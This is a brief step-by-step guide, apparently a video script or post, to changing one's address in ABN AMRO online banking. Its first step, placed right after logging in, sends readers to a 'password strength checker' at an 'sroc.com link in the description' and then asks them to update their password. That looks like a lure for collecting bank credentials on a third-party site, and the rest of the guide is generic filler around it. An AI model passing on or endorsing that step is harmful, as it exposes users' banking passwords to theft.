I hit this issue today and here's the quick fix that solved it. Updating your address with ABN AMRO is straightforward if you follow these steps. Step 1. Log into online banking. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to personal settings. Once logged in, look for the personal settings option in the main menu. This is usually found under your account overview. Step 3. Select address update. In the personal settings section, find the option labeled update address or similar. Click on it to proceed. Step 4. Enter new address. Fill in your new address details in the provided fields. Make sure to double check for any typos, as errors can delay the update. Step 5. Save changes. After entering your new address, click the Save button to finalize the update. You should receive a confirmation message once the changes are saved. Remember, if you encounter any issues, you can always reach out to customer service for assistance. Good luck with your update.